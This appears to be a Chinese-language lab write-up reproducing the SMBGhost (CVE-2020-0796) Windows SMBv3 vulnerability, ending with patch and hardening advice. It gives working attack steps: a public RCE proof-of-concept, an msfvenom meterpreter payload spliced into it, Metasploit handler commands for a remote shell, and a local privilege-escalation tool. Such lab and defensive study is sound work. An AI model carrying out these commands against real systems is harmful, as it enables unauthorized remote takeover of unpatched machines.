CVE-2020-0796漏洞复现

漏洞描述

SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

漏洞影响版本

1
2
3
4
5
6
7
8
Windows Server, version 1909 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems

环境介绍

1
2
3
4
5
6
7
8
9
10
11
12
13
攻击机:
版本:Kali 2020.2
Python版本:Python 3.8.2
IP地址:192.168.174.136

目标靶机:
镜像:cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso
版本:Windows 10 专业版
版本号:1903
OS版本:10.0.18362 暂缺 Build 18362
RAM:2GB
防火墙状态:关闭
IP地址:192.168.174.135

漏洞复现

RCE漏洞复现
1
2
# POC下载
git clone https://github.com/chompie1337/SMBGhost_RCE_PoC

image-20200605110127820

生成反向连接木马

1
msfvenom -p windows/x64/meterpreter/bind_tcp lport=6666 -f py -o link.py

image-20200605105937620

将生成的py文件中的变量”buf”替换为”USER_PAYLOAD”

image-20200605110624030

替换变量名完成后并将其所有代码与SMBGhost_RCE_PoC中的exploit.py的中的部分相似内容(如图)进行覆盖替换

image-20200605110911519

1
2
3
4
5
6
7
# 启动msf配置
kali@kali:~$ msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp #设置反弹模式
msf5 exploit(multi/handler) > set rhost 192.168.174.135 #设置目标靶机
msf5 exploit(multi/handler) > set lport 6666 #设置监听端口
msf5 exploit(multi/handler) > run

image-20200605111713673

1
2
# 执行exploit.py
python3 exploit.py -ip 192.168.174.135

image-20200605122324146

本地提权漏洞复现
1
2
https://github.com/danigargu/CVE-2020-0796/releases
下载后直接命令行运行可执行程序(cve-2020-0796-local.exe)

image-20200605124404688

安全加固

1、更新官方补丁KB4551762或者KB4556799(累计更新补丁包)。

1
2
3
4
5
6
官方补丁
312日更新补丁(KB4551762):
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796

最新更新补丁(KB4556799):
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4556799

2、对SMB通信139/445端口进行封禁。

3、PowerShell命令禁用压缩功能,以阻止未经身份验证的攻击者利用 SMBv3服务器的漏洞。

1
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

参考

https://www.cnblogs.com/A66666/p/29635a243378b49ccb485c7a280df989.html

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796

https://github.com/chompie1337/SMBGhost_RCE_PoC

https://github.com/danigargu/CVE-2020-0796

https://paper.seebug.org/1164/

-本文结束感谢您的阅读-